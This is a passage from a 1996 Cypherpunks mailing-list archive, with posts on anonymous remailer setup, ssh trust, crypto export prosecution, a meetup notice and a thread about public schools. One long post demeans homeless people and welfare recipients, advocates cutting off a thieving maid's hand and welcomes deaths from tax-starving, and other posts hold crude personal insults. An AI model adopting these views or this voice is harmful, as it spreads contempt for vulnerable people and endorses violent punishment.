with simple, one-word pseudonym, no quotes, no address, no nothing. 2: Generate -kxa keyfile, pseudo.asc 3: -esa encrypt keyfile with Jenaer Remailer's PGP key and send to anon at as-node.jena.thur.de via a remailer. 4: Account is automatically established and should work immediately. To test... 1: Prepare message textfile according to sample: Newsgroups: de.test Subject: Test This is the test message textbody... [or, alternately...] To: de.test at news.demon.co.uk Subject: Test This is the test message textbody... 2: PGP encrypt the filebody and two header lines with the Jenaer Remailer's key using the -esa command, signing the cyphertext with your key previously sent to the remailer. 3: Send the resulting cyphertext message to the Jenaer Remailer via another remailer, making sure to avoid command words in the Subject: field of the outgoing message. As I say, following these protocols I have not yet seen a resulting message in the test group I have chosen. Do you feel this is due to lag, or am I doing something obviously wrong? w> 2E.request Email to be delivered? [...] w> - Never request a delivery to your real Email address. So here's what I really want to know: When/if the new account is up and running, how _does_ one discreetly retrieve his mail? I don't see how, other than to have it sent to alt.anonymous.messages via a mail2news netmail address such as alt.anonymous.messages at news.demon.co.uk and then pick through the mess there until some cyphertext message responds to his right key. Either that or else have it sent to yet another pseudonymous account, with all the uncertainties and delivery vicissitudes that entails. From adam at homeport.org Fri Sep 27 13:57:42 1996 From: adam at homeport.org (Adam Shostack) Date: Sat, 28 Sep 1996 04:57:42 +0800 Subject: ssh - How widely used? In-Reply-To: <199609271552.LAA08679@jekyll.piermont.com> Message-ID: <199609271823.NAA08790@homeport.org> Actually, I recommend systems based on threat and comfort. If the system is protected (ie, behind a firewall, on a compartmentalized network), I use ssh, no problem. I use ssh even where I'm not comfortable with it because I'm more comfortable with it than with the alternatives, but there are times when the "No remote access" option is more comfortable than ssh. Adam Perry E. Metzger wrote: | Chad Dougherty writes: | > > Despite all this, I use it, like it, and recomend it for use | > > in systems not likely to come under attack by professionals. | > | > Why do you say "not likely to come under attack by professionals"? | > Have you found security holes in it? | | Security professionals do not recommend use of systems they feel less | than perfectly comfortable with whether or not they know of specific | holes. -- "It is seldom that liberty of any kind is lost all at once." -Hume From jbugden at smtplink.alis.ca Fri Sep 27 14:25:00 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Sat, 28 Sep 1996 05:25:00 +0800 Subject: Public Schools Message-ID: <9608278438.AA843856542@smtplink.alis.ca> ronsimpson at unidial.com wrote: >I hate to burst any bubbles but, the school with the highest number > of National Merit Finalists and highest number of 1600 SATs is a > Public High School (Jefferson High in Fairfax, VA) The same is true for Montreal (Royal Vale) using the equivalent scoring methods. But there are public schools at both extremes of the curve. While it is true that Private Schools would not survive due to market forces if they did consistently poorly, it is also true that they filter their incoming student body in a manner that Public Schools can not. If you want to refuse those who are too stupid or anti-social from Public Schools in order to improve the social or intellectual climate, you better have a solution for the resulting cast-offs. James From nobody at huge.cajones.com Fri Sep 27 14:36:10 1996 From: nobody at huge.cajones.com (Huge Cajones Remailer) Date: Sat, 28 Sep 1996 05:36:10 +0800 Subject: The periodic word of advice about Timothy May, the licenced fellatiologist Message-ID: <199609271806.LAA07079@fat.doobie.com> There's a rumor that Timothy May sells his dead relatives as fertiliser as they constitute the best shit in California. From nobody at replay.com Fri Sep 27 14:40:24 1996 From: nobody at replay.com (Anonymous) Date: Sat, 28 Sep 1996 05:40:24 +0800 Subject: Mousepad RNG's? Message-ID: <199609271814.UAA15991@basement.replay.com> I just downloaded a copy of the beta version of Datafellows Windows 3.1 SSH and it asked to move the mouse around to generate some randomness. In reading Applied Crypto, it mentioned that there is no such thing as generating randomness from a personal computer unless something like a Geiger counter is used. Is there any way to create a fairly random sample from the mouse? Should one use lots of jerky movements, or take ones time with it? Thanks! P.VonL. From sophi at best.com Fri Sep 27 15:15:03 1996 From: sophi at best.com (Greg Kucharo) Date: Sat, 28 Sep 1996 06:15:03 +0800 Subject: "Soul Catcher" Computer Chip (fwd) In-Reply-To: Message-ID: <199609271819.LAA01793@shellx.best.com> I think this lends new meaning to the phrase,"been there, done that". Greg Kucharo sophi at best.com From declan at eff.org Fri Sep 27 15:17:36 1996 From: declan at eff.org (Declan McCullagh) Date: Sat, 28 Sep 1996 06:17:36 +0800 Subject: Public Schools In-Reply-To: <324BD4FD.3372@unidial.com> Message-ID: Yeah, Fairfax has good schools. But you're misrepresenting the truth: what school has the highest *percentage* of 1600 SATers, etc. I suspect Jefferson High is larger than most private schools. -Declan On Fri, 27 Sep 1996, ronsimpson wrote: > I hate to burst any bubbles but, the school with the highest number of > National Merit Finalists and highest number of 1600 SATs is a Public > High School (Jefferson High in Fairfax, VA) > // declan at eff.org // I do not represent the EFF // declan at well.com // From azur at netcom.com Fri Sep 27 15:21:57 1996 From: azur at netcom.com (Steve Schear) Date: Sat, 28 Sep 1996 06:21:57 +0800 Subject: Decense: What ever happened to it? Message-ID: I haven't seen anything on the Net since February regarding Ray Cromwell's Decense Web anonymity project. Does anybody on the list have more recent info? PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to prescription DRUGS. "Of all tyrannies, a tyranny sincerely exercised for the good of its victims may be the most oppressive." -- C.S. Lewis "Surveillence is ultimately just another form of media, and thus, potential entertainment." -- G. Beato From claborne at CYBERTHOUGHT.com Fri Sep 27 15:35:01 1996 From: claborne at CYBERTHOUGHT.com (Christian Claborne) Date: Sat, 28 Sep 1996 06:35:01 +0800 Subject: San Diego CPunk Physical meeting this comming Thursday Message-ID: <2.2.32.19960927185434.0031daf0@cyberthought.com> <<<<< NOTE! I have a new address!!! >>>>>> Next Thursday!!! San Diego Area CPUNKS symposium Thursday, Oct. 3, 1996. Invitation to all Cypherpunks to join the San Diego crowd at "The Mission Cafe & Coffee Shop". We discuss cryptography and other related subjects, have the special cypherpunk dinner, and unwind after a long day at the grind stone. Don't forget to bring your public key fingerprint. If you can figure out how to get it on the back of a business card, that would be cool. If you want the suspicious crowd there to sign your key, bring two forms of ID. Michelle is going to bring her PGP fingerprint in for signature. Can you believe it? Hopefully Lance Cottrell will give us an update on Mixmaster and what's going on at San Diego's best ISP. You can also get the scoop on the latest development of my job situation (hint, some people are getting free eats from me on Thurs). Place: The Mission Cafe & Coffee Shop 3795 Mission Bl in Mission Beach. 488-9060 Time:1800 Their Directions: 8 west to Mission Beach Ingram Exit Take west mission bay drive Go right on Mission Blvd. On the corner of San Jose and mission blvd. It is located between roller coaster and garnett. It's kind of 40s looking building... funky looking (their description, not mine) They serve stuff to eat, coffee stuff, and beer + wine. See you there! New guy, bring your fingerprint. Drop me a note if you plan to attend... NOTE: My primary e-mail address has changed to use my own domain. You can reach me at "claborne at cyberthought.com". Permanently replace any other address that you may have for me. I am currently not subscribed to the CP list since my current internet connection is slow (I can't afford anything right now :) 2 -- C -- ... __o .. -\<, Claborne at CYBERTHOUGHT.com ...(*)/(*)._ Providing thoughts on your computing needs. http://www.CYBERTHOUGHT.com/cyberthought/ PGP Pub Key fingerprint = 7E BF 38 3F 24 A7 D1 B0 54 44 96 AA 10 D0 5D 51 Avail on Pub Key server. PGP-encrypted e-mail welcome! Dreams. They are just a "screen saver" for the brain. From talon57 at well.com Fri Sep 27 15:37:04 1996 From: talon57 at well.com (Brian D Williams) Date: Sat, 28 Sep 1996 06:37:04 +0800 Subject: [SUGGESTION] signal/noise ratio Message-ID: <199609271930.MAA04776@well.com> In the interest of those who wish a significant increase in the signal/noise ratio I make a proposal. Significant crypto related posts could be prefaced with [CRYPTO] on the subject line on a strictly volunteer basis, that way those desiring a more topical list could have one simply by setting the appropriate filter. Items crypto related but missing the [CRYPTO] header could be reposted by well meaning souls. Other appropriate headers could of course be used. Brian From dlv at bwalk.dm.com Fri Sep 27 16:10:08 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 28 Sep 1996 07:10:08 +0800 Subject: Public Schools In-Reply-To: Message-ID: "Timothy C. May" writes: > Yes, shocking as it may seem, I AM A PRODUCT OF PUBLIC SCHOOLS. That's pretty obvious. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From Lsurfer at cris.com Fri Sep 27 16:12:38 1996 From: Lsurfer at cris.com (Randy Bradakis) Date: Sat, 28 Sep 1996 07:12:38 +0800 Subject: Public Schools In-Reply-To: <324BD4FD.3372@unidial.com> Message-ID: The human formerly known as "ronsimpson " wrote: {I hate to burst any bubbles but, the school with the highest number of {National Merit Finalists and highest number of 1600 SATs is a Public {High School (Jefferson High in Fairfax, VA) Er, how about the schools with the highest percentages, not the largest number? A public school will most certainly have more students than home schools or private schools. Every home schooled child I know has a significantly better grasp on the world than any public or private schooled child. Perhaps only because their parents take a great interest in their education, but the results stand out regardless. Cypherpunk relevance? Sure - what does the gubmint allow you to do? What information are you allowed to learn, and from what authorized sources? How are those sources authorized? Who stamps the seal of information approval upon those documents, and how do we know that the information isn't simply a 'corrected' view of history (or physics, or english language...)? We don't, unless there are multiple channels of information to compare against, from 'signed' by experts, to pseudonymous authors, to completely anonymous authors. The only way to be certain that your children learn about the way things _really_ are, is to allow for these sources. -- no sig too small From tcmay at got.net Fri Sep 27 16:17:11 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 28 Sep 1996 07:17:11 +0800 Subject: Workers, Public Schools, Tradesmen, and Justice In-Reply-To: <9608278438.AA843856542@smtplink.alis.ca> Message-ID: At 1:35 PM -0500 9/27/96, jbugden at smtplink.alis.ca wrote: >If you want to refuse those who are too stupid or anti-social from Public >Schools in order to improve the social or intellectual climate, you better >have >a solution for the resulting cast-offs. Believe me, I don't mean to be provocative (in a trolling sense), but "I have a solution." More students should, fairly early on, be "flunked out" of courses in the "academic/professional track" and moved into _trades_. For example, the way many European countries have outstanding vocational/trade schools. The usual trades: machinists, woodworkers, auto mechanics, technicians of all sorts, and so on. Few of these trades need, or even benefit from, courses in history, mathematics (beyond simple algebra and a tad of geometry, not the really neat stuff about proving Euclid's theorems in novel ways, the things people like me excelled in, but which left many other students shaking their heads and barely passing the class), etc. Most of the academic subjects in high school are neither needed nor remembered. (And I reject any of the common arguments that Americans need to learn history, the Constitution, etc. Few of them remember a single word they learned, and one might as well teach the basics in earlier grades and dispense with meaningless lectures about how and when the Senate may invoke cloture, how the Foreign Powers Act modified the 1877 Trade Act, and so on.) As I look around me, here in Santa Cruz, I see hundreds of "homeless persons.: We used to call them beggars, bums, panhandlers, winos, hobos, and drifters. The people unwilling to get up in the morning for a boring job, the people unwilling to take the donations they get and buy some new clothes at the Salvation Army (I know people of both sexes who buy their business clothes at thrift shops, at huge discounts, so I reject any of the usual arguments that this won't work.) When I see people working at Taco Bell, Burger King, gas stations, etc., and then I see the so-called "homeless," the situation is completely clear to me. And, like pigeons, if you begin feeding the beggars, you'll have more of them. There's a further point to consider. In times past, many of the "marginal" people had other kinds of jobs. Maids, gardeners, cooks, stable boys, butlers, etc. (I'm not saying they were all subnormal, neurotic, etc., just that many of them didn't fit into other sorts of jobs--like running the town store, raising sheep, shoeing horses, and other "professions," such as they were then--and working for others as maids and assistants of various sorts was a kind of sheltered, almost "familial," kind of employment. Shelter was often provided on-site, further aiding those who might find it hard to cope with the outside "market." These jobs have largely gone away. Partly because houses have gotten smaller (compared to manor houses, for example), partly because of automation and other technological advances (cars, refrigerators, etc.), partly because of "egalitarian" sentiments that tend to discourage people from either hiring maids or from seeing maid service as a longterm career. (Getting back to an earlier point, that dingbat studying "Sociology 101" and "History of Consciousness" at Valley Girl Community College is being _told_ she's headed for a professional career, despite her lack of interest in academic topics and her marginal abilities....there's no way someone like her will think seriously of such a "low-class" job as a maid! Better for her to cadge for spare change and deal some drugs on the side than do something that demeaning.) It has also become almost impossible to find good tradespeople. Stories of good gardeners, babysitters, maids, and even roofers being "hoarded" by Marin County or Beverly Hills millionaires are only partially exaggerated. This has a lot to do with the limited supply, and also with problems of work ethic, honesty, and such things, many of which have changed rather dramatically in recent decades. Where once a worker in one's house could mostly be trusted, despite the occasional reports of items of silverware missing, today's workers are seldom to be trusted alone in the house. Horror stories abound of "home alone" workers throwing parties, rooting through the personal papers of their employers, and of robbing the houses of whatever they could carry. And the "nanny tax" and related paperwork needed to hire a person for even a few hours worth of work has made much casual work (the "odd jobs" that drifters used to get to earn enough money to eat) almost impossible to arrange. (Every morning there are Mexicans lined up in the parking lot of a K-Mart in a nearby town, with contractors seeking to hire temporary laborers. The contractors know all the forms to fill out, if they bother. Casual employers like me know they risk heavy fines if caught hiring "undocumented workers," or failing to dot all the "i"s and cross all the "t"s, even for a 4-hour job. So much for liberty. For the last couple of weeks I've been hauling 70-pound stones to build a retaining wall (don't ask me about the permits I should've gotten), ripping up redwood deck boards, digging postholes for a new fence, and generally doing a couple of hours of manual labor every day. While it has its advantages, in earlier days I could've counted on providing some employment for someone who today is "a homeless person." No more. They're not psychologically prepared to do a solid (if unspectacular) job, as they've been taught for all of their lives that they went through high school and maybe a couple of years of college (and maybe more) so they could join the professional ranks....when they see they really won't be joining the professional ranks, and that they really don't want to make the sacrifices to, they have nothing to fall back on. So, in the "olden days," the social bargain was this: I'd spend some of the money I'd accumulated in whatever manner I had and exchange it with some of the tradespeople or laborers for their labor. A fair deal for both. Now, we've got trash littering our highways, but nobody thinks seriously of having prisoners pick it up (the "chain gangs" when I was a kid), or having "welfare mothers" out picking it up, or having day laborers do the work. Ditto for all sorts of other "infrastructure" work that's needed. (I knew someone married to a honcho in CalTrans, the California Department of Transportation, responsible for the freeways. He confirmed that "cheap labor" is barred, by various union contracts negotiated over the years, and that the starting pay for CalTrans workers is $30K a year...probably more by now. So, "homeless people" are sitting around begging for spare change and harassing passersby, welfare mothers are collecting welfare, AFDC, food stamps, and WIC money for doing nothing except their specialty (as someone noted, "welfare-powered bastard factories"), University of California "History of Consciousness" (yes, a real major) graduates are waitressing tables at local Santa Cruz restaurants (because they can't find employers who want a "HofC" graduate, as with so many worthless majors), all the while CalTrans is hiring "transportation engineers" for far-more-than-market prices to pick up trash on highways. Anybody still think things are not out of whack?) My conclusion is simple: Tell people if they don't work, they won't eat. If they do something others are willing to give them money to do, they won't get money. They won't get "entitlements" from the government (= taxpayers, = those who are working, = me and thee). Tell them that a college education should only be pursued if one has a "calling" to be an engineer, a programmer (and probably not even that, judging by what I see), a doctor, a lawyer (on second thought, don't ever suggest they become lawyers), and so on. And make it easier to hire people, instead of harder. (And if one hires a maid, and the maid steals, cut off her hand. We've lost sight of justice, and people think that ripping off the rich is their kind of justice. This needs to change.) Even liberals are beginning to understand the "game theory" aspects. Like pigeons, if you feed them, you'll have more bums, winos, addicts, drifters, and beggars. If you give people money when they have babies, whether they are working or married, they'll drift into having more babies. (Not as a carefullly-considered choice, but for a variety of systemic, psychological, game-theoretic, and "path of least resistance" reasons.) Psychologists and similar psychobabblers call it "tough love." If one always "enables" an addict, a layabout, a shiftless worker, with excuses and handouts, the behavior does not change. To save a person, sometimes harshness is needed. This is why crypto anarchy's starving of the tax system is good. It may "kill" some number of people, as nearly any new idea does, but ultimately it will put things back on track. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From attila at primenet.com Fri Sep 27 18:18:04 1996 From: attila at primenet.com (attila) Date: Sat, 28 Sep 1996 09:18:04 +0800 Subject: In defense, sort of, of Phill Hallam-Baker In-Reply-To: Message-ID: <199609272142.PAA14851@InfoWest.COM> you are absolutely right, as difficult as it is to remain passively disengaged from annoying mosquitos.... wrong: sorry Phill for my criticisms, but you're still fucking clueless... right: -- "To what do you owe your success in acting?" "Honesty. Once you've learned how to fake that, you've got it made." From unicorn at schloss.li Fri Sep 27 18:28:22 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 28 Sep 1996 09:28:22 +0800 Subject: Is "Black Unicorn" a lawyer, or just a nym used by a lawyer? In-Reply-To: <199609270540.XAA21446@InfoWest.COM> Message-ID: I do not currently have an active practice in the United States. Should a project come along within those boarders which interests me, that might change. I do not foresee that happening however. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From markm at voicenet.com Fri Sep 27 18:29:51 1996 From: markm at voicenet.com (Mark M.) Date: Sat, 28 Sep 1996 09:29:51 +0800 Subject: Newsgroup proposal: misc.anonymous In-Reply-To: <199609270522.WAA14373@abraham.cs.berkeley.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 26 Sep 1996, John Anonymous MacDonald wrote: > This sounds like a good idea. I would certainly vote for such a news > group. Should the name be misc.anonymous or misc.anonymous.messages? > Are alt.anonymous and alt.anonymous.messages basically to different > newsgroups for exactly the same purpose, or is there some difference > between them. This is what's listed in the newsgroups file: alt.anonymous alt! Who goes there? alt.anonymous.messages An anonymous message pool newgroup, whatever that is. Alt.anonymous is just another content-free, basically dead newsgroup. Alt. anonymous.messages is the group used for message pools. Since the general rule for naming newsgroups is to use dots only for designating a lower group hierarchy. misc.anonymous-messages is probably a better name, since there is no misc.anonymous.* newsgroup hierarchy. Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMkxX8yzIPc7jvyFpAQEwRggApePkCcuHKMy3l3dHaMfBBr44WkZwSKJo VcRnC16rKu8cof/vS1rAZPv6/504Z9u4Q8M+S5nxK8V6vVFPzA+TF/I/TQs8FekU eTAAmD2FXarZRYUKw4iraxRba5CkHuKNs8h7G+d9XrfZ71kFMlcP9Kmi968bxx+I IuyVX6PEmaapbC88GZukfDCfTwuW0aZvhqseB/dzSeDnDXgfMYdNXHXBXJr+maiH Nf6tXNFYlsf1D3D/JF6u31n4JDGi9fHrz+9nNH6xpKy8EAehJzQd2aQME2fKDYHJ zu+tfyLc8I/irYpTOUtZ0nRYxUxBZoJ8moucD9569erZY0OEMqc4/Q== =lblb -----END PGP SIGNATURE----- From attila at primenet.com Fri Sep 27 18:34:34 1996 From: attila at primenet.com (attila) Date: Sat, 28 Sep 1996 09:34:34 +0800 Subject: active practice in America In-Reply-To: Message-ID: <199609272225.QAA15967@InfoWest.COM> In , on 09/27/96 at 05:51 PM, Black Unicorn said: I do not currently have an active practice in the United States. Should a project come along within those boarders which interests me, that might change. I do not foresee that happening however. I presumed that --it's a plus! I never did, and never will. the research and the smell of blood (if channeled to real justice) is immensely satisfying --it is the members of the American club, and the intendent body trading which turns my stomach --that, and 'kill' based compensation. the difference in civil v. common law origined justice is not the code... to put it another way: in criminal procedings: I would rather be considered guilty, until proven innocent; than I would be presumed innocent, until proven guilty beyond a reasonable doubt. a nation whch can base a conviction on conspiracy to commit a crime, or permits circumstantial evidence to close the gap towards 'beyond a reasonable doubt,' has lost any pretense of understand- ing the heritage of common law: the Magna Carta. -- Of course the US Constitution isn't perfect; but it's a whole lot better than what we have now. From jimbell at pacifier.com Fri Sep 27 18:41:20 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 28 Sep 1996 09:41:20 +0800 Subject: Internet plug pulled on Colombia's guerrillas Message-ID: <199609272133.OAA11948@mail.pacifier.com> At 03:05 PM 9/26/96 -0700, Chris Adams wrote: >Internet plug pulled on Colombia's guerrillas > 3:05pm EDT, 9/26/96 >BOGOTA, Colombia - A Colombian guerrilla group currently >involved in a bloody offensive in the mountains and jungles, >suffered a setback in its propaganda battle when its new-tech >voice on the Internet was mysteriously silenced. > >The Revolutionary Armed Forces of Colombia (FARC), which >has periodically paralyzed half the country with road blocks, >found its route to the information superhighway barred. > >The Communist insurgents, who rose up in arms in 1964, >embraced new technology last year in their fight to overthrow the >government by launching a home page on the Internet. I couldn't resist smiling when I read this. Not that I want their access cut; quite the opposite. But it is REALLY reassuring to see the authorities behave in exactly the fashion you expect them to! Attempting to cut off dissenting political voices IRL is de rigeur; now, this shows that they believe "threat" to the government posed by allowing others to voice contrary opinions on the 'net is real. Jim Bell jimbell at pacifier.com From markm at voicenet.com Fri Sep 27 18:42:55 1996 From: markm at voicenet.com (Mark M.) Date: Sat, 28 Sep 1996 09:42:55 +0800 Subject: Newsgroup proposal: misc.anonymous In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 27 Sep 1996, Robert Hettinga wrote: > It seems that if newsgroup RFC and the whole rigamarole of newsgroup voting > was set up, there would be enough people -- on this list alone, probably -- > who would be interested enough in the idea to at least vote (publically) > for it. I certainly would, just to see what happens. > > Of course, that means that someone *else* ;-) has to actually put the train > on the track, much less lay the rails, which, as usual, is the main problem > here. If we had some ham, we could have some ham and eggs, if we had some > eggs. If you lived here, you'd be home now. And so forth. > > Same as it ever was. You're forgetting that "Cypherpunks write RFD's". I'll write up a formal Request For Discussion in my copious spare time. I have no experience in the newsgroup creation process, but it is well documented in the news.announce.newgroups FAQ's. Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMkxbnizIPc7jvyFpAQGbhgf+PwVQJL6pfULIo83ckKwCyqd3uQXJRSyU A9zKSE21KYxZl91N5PfGBBoeBc6Slnit6KdduPEUHI8d1YrDG6XWs8CDiXHJxSDW BQolYGAqiRLJA3ickQTuM33CUmW7GRHzXSHXKF9Skx9oKanO08LjgHcd0H9AZ7sY zHBubzw8ud9OjQUSnTbkTRDGVtUIA6sE+TZhDz5Sb3FbjtBw/9I/yBi5vC87o97F HUJp8HvxtsrxUrlPXzOb5/w2ECBQiwNtYbdwwEmJYbbKPAeTf68KOKw/VbpKcE7X G7qXzDbO0En7JZ4dO2TKCGoFtrgzMpf9PyfHQ+Es1diRSq645qCb7g== =RrXA -----END PGP SIGNATURE----- From mccoy at communities.com Fri Sep 27 18:43:15 1996 From: mccoy at communities.com (Jim McCoy) Date: Sat, 28 Sep 1996 09:43:15 +0800 Subject: [NOISE] Re: Public Schools In-Reply-To: <324BD4FD.3372@unidial.com> Message-ID: Lsurfer at cris.com (Randy Bradakis) wrote: >The human formerly known as "ronsimpson " wrote: >{I hate to burst any bubbles but, the school with the highest number of >{National Merit Finalists and highest number of 1600 SATs is a Public >{High School (Jefferson High in Fairfax, VA) > >Er, how about the schools with the highest percentages, not the largest >number? A public school will most certainly have more students than >home schools or private schools. Well, even then you are probably going to have a tough time making your argument. Public "magnet" schools and other public schools which target the top flight students in major metropolitan areas will usually have a very high percentage of such students because they are able to "cherry pick" the ones they want (and avoid dragging down averages with students whose parents have "pull" that some private schools must deal with.) If you take the percentages for a school district or other large geographic area which covers several schools you will probably end up with a better comparison. Then again, even with such a geographic comparison you may not end up with the results you seem to want. In certain areas of the US the public schools are excellent (generally the Midwest judging from published surveys of test results and other somewhat meaningless tests :) and in some ares the public schools are horrific. Making broad claims regarding which types of education are good and which are bad is often a fools errand.... jim From hallam at ai.mit.edu Fri Sep 27 18:43:43 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Sat, 28 Sep 1996 09:43:43 +0800 Subject: In defense, sort of, of Phill Hallam-Baker In-Reply-To: <52h5cl$5v4@life.ai.mit.edu> Message-ID: <324C56AE.794B@ai.mit.edu> Robert Hettinga wrote: > However, I also think that Phill has this passion for order that sometimes > borders on the pathological. Maybe because, like Bertrand Russell (who > Phill and I both admire) says, romanticism, leftism and communism are > basically feudalism in disguise, and Phill's a closet aristocrat. ;-). > Maybe not. Of course socialism is grounded in paternalism. Robert Owen, its founder was in his day the equivalent of Steve Jobs, an extreemly rich and successful merchant who considered that wealth also implied responsibility. > I think what we see as his blustering trolls on this list come from > passion. But, I don't think they're trolls at all. I think they show, more > often than not, his outrage at the way the world's going to go. Which, > obviously, is *our* way, and not his. He knows very well the power of the > technology we talk about here, and deep down, I think he knows we're right. If people want to have a sensible disscussion about technology and policy then I think that keeping the discussion grounded in reality is a good thing. I don't think that the political situation is going in a libertarian direction, quite the opposite. I see technology as having greatly increased the power of government and that it will be necessary to institute checks and balances to make it work. I also think that you are being very naive with regards to the threat posed by corporations to individual liberties. I see no reason to distinguish between corporate intrusions and state intrusions except in one respect. If we can't find a way to make society work without some form of intrusion the agency that is responsible has to be under democratic control. I think that unless the case for privacy is put in a way which society at large accepts then Freeh and the corporations will win. HMOs will be touting peoples medical records on the open market (many already do), employers will vet empoloyees on the basis of reports drawing on information on video rentals and so on. I certainly don't agree with Denning or Sternlight. Sternlight is either a fool or an invention of the NSA. Denning bases her argument against crypto on hidden sources. I know my experience in the area concerned to be significantly greater than hers since if she had operational experience she would say so. Phill From unicorn at schloss.li Fri Sep 27 18:47:20 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 28 Sep 1996 09:47:20 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: On Thu, 26 Sep 1996, Timothy C. May wrote: > At 1:37 PM -0400 9/26/96, Black Unicorn wrote: > > >> > >> b. evidence that the "confession" can be backed up by other evidence > >> > > > >In the case of the export at hand, a passport record exists, and surely > >the notebook exists. Were I a prosecutor with a bug in my rectum, I would > >think I had something of a case. > > What evidence of any sort do they have that any particular notebook > computer was involved in the trip offshore? Seems to me this is a rather > major defect in the evidence chain. His admission that he used the notebook. Recovering the notebook and finding the software. Interviewing the Customs agent working at the time. Considering the headaches required for airline travel today, it's not like there aren't serious records abound. For crying outloud, he admitted to the world that he took the software out. I put that in front of a jury and it looks just like the typical stupid bragging criminal. Any defense about "I was just kidding" or "The message was forged" might be interesting, but it will sound like technical-mumbo-jumbo to a jury. Yes, it would convince >ME< that was a reasonable doubt, but a jury is very unlikely to buy it. Juries almost never buy things they don't understand. Technical talk makes them sleepy. "Can't we go back to the hotel now? Dey gots good eatings." > > --Tim May > > > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Fri Sep 27 18:58:42 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 28 Sep 1996 09:58:42 +0800 Subject: Public Schools In-Reply-To: <324BD4FD.3372@unidial.com> Message-ID: On Fri, 27 Sep 1996, ronsimpson wrote: > I hate to burst any bubbles but, the school with the highest number of > National Merit Finalists and highest number of 1600 SATs is a Public > High School (Jefferson High in Fairfax, VA) As a former Fairfax resident I can tell you that the reason the school preforms so well is because of the immense income from local property taxes, and because the Fairfax school system has taken great pains to maintain autonomy and freedom from the public school system at large. They have managed, quite effectively, to create a private school that receives public funds and keeps out interlopers. They have my admiration for this task. I can also point out that everyone in the Greater D.C. area is trying to get their kids into the various Fairfax schools. Some resort to lying to the DMV about their address to do so. It is a measure of the clout of the Fairfax school system that a few complaints have triggered a crackdown on district monitoring which (surprise surprise) is concentrated in Fairfax. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From paul at fatmans.demon.co.uk Fri Sep 27 19:10:40 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Sat, 28 Sep 1996 10:10:40 +0800 Subject: Possible subs attack???? Message-ID: <843834821.2722.0@fatmans.demon.co.uk> > whose list is this, and why am I on it? Please delete my name > now. I have noticed a lot of these messages on the list over the last day or two, I can only assume Vilus/Detweiller/Some other troublemaker has decided to subscribe a few people using fake return addresses, anyone else got any ideas on what else could have caused people to be subscribed? Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org Http://www.cryptography.home.ml.org/ Email for PGP public key, ID: 5BBFAEB1 "Don`t forget to mount a scratch monkey" From um at c2.net Fri Sep 27 19:37:12 1996 From: um at c2.net (Ulf Moeller) Date: Sat, 28 Sep 1996 10:37:12 +0800 Subject: quotation Message-ID: Found in a sig file: "The people involved in the crypto debate are all intelligent, honorable and pro-escrow, but they never possess more than two of these qualities at once." -- Kenneth Neil Cukier (100736.3602 at compuserve.com) From wmono at Direct.CA Fri Sep 27 19:38:04 1996 From: wmono at Direct.CA (William Ono) Date: Sat, 28 Sep 1996 10:38:04 +0800 Subject: [NOISE] Re: Jena Remailer In-Reply-To: <199609271630.JAA24185@sirius.infonex.com> Message-ID: My appologies in advance to the list for this noise. Dear Anonymous, if there is another way to contact you, please let it be known so that this need not involve the 1500 others on the list. On Fri, 27 Sep 1996, Mixmaster wrote: > OK, it's an improvement, but there's still some obscurity and a couple > of other problems: > w> * The hexadecimal key-ID forms the Email address. For example, > if the nym's key is 0x01020304, the address will be: > anon-01020304 at as-node.jena.thur.de > > Already a confusion: Is not the address pseudonym at as-node.jena.thur.de? No, it's not. "the address will be: anon-01020304 at as-node.jena.thur.de" implies that the address will be anon-01020304 at as-node.jena.thur.de > And, since the key ID is an eight-digit hex number, why the confusing > > "...if the nym's key is 0x01020304, the address will be:" > ^^ > ...or am I missing something already? 0x is used to indicate that the characters that follow are in hexadecimal. > w> * The user-ID of the key contains the pseudonym, only. Note: > This is different from the convention, which is to include the > Email address in angle brackets. > > OK, so if I understand this properly, when prompted for an account name > 